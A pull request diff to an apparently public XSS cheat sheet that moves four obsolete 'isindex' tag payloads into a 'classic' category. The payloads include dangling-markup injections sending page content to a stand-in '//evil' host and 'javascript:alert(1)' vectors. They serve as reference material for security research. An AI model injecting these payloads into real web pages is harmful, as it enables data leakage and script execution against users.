### PR TITLE
Move `isindex` to classic

### DIFF
--- a/json/classic.json
+++ b/json/classic.json
@@ -116,5 +116,33 @@
         "browsers": [
             "safari"
         ]
-    }    
+    },
+    {
+        "description": "Isindex using src attribute",
+        "code": "<isindex type=image src=\"\/\/evil?",
+        "browsers": [
+            "edge"
+        ]
+    },
+    {
+        "description": "Isindex using submit",
+        "code": "<isindex type=submit style=width:100%;height:100%; value=XSS formaction=\"\/\/evil?",
+        "browsers": [
+            "edge"
+        ]
+    },
+    {
+        "description": "Isindex and formaction",
+        "code": "<isindex type=submit formaction=javascript:alert(1)>",
+        "browsers": [
+            "edge"
+        ]
+    },
+    {
+        "description": "Isindex and action",
+        "code": "<isindex type=submit action=javascript:alert(1)>",
+        "browsers": [
+            "edge"
+        ]
+    }
 ]

--- a/json/dangling_markup.json
+++ b/json/dangling_markup.json
@@ -120,20 +120,6 @@
         ]
     },
     {
-        "description": "Isindex using src attribute",
-        "code": "<isindex type=image src=\"\/\/evil?",
-        "browsers": [
-            "edge"
-        ]
-    },
-    {
-        "description": "Isindex using submit",
-        "code": "<isindex type=submit style=width:100%;height:100%; value=XSS formaction=\"\/\/evil?",
-        "browsers": [
-            "edge"
-        ]
-    },
-    {
         "description": "Object data",
         "code": "<object data=\"\/\/evil?",
         "browsers": [
@@ -259,5 +245,5 @@
             "chrome",
             "safari"
         ]
-    }  
+    }
 ]

--- a/json/protocols.json
+++ b/json/protocols.json
@@ -194,20 +194,6 @@
         ]
     },
     {
-        "description": "Isindex and formaction",
-        "code": "<isindex type=submit formaction=javascript:alert(1)>",
-        "browsers": [
-            "edge"
-        ]
-    },
-    {
-        "description": "Isindex and action",
-        "code": "<isindex type=submit action=javascript:alert(1)>",
-        "browsers": [
-            "edge"
-        ]
-    },
-    {
         "description": "Use element with an external URL",
         "code": "<svg><use href=\"//subdomain1.portswigger-labs.net/use_element/upload.php#x\" /></svg>",
         "browsers": [


### PR DESCRIPTION
As `isindex` is an obsolete tag, I moved into `classic` section. I confirmed in a past tweet with Gareth that it should be in this section.

https://developer.mozilla.org/en-US/docs/Web/HTML/Element/isindex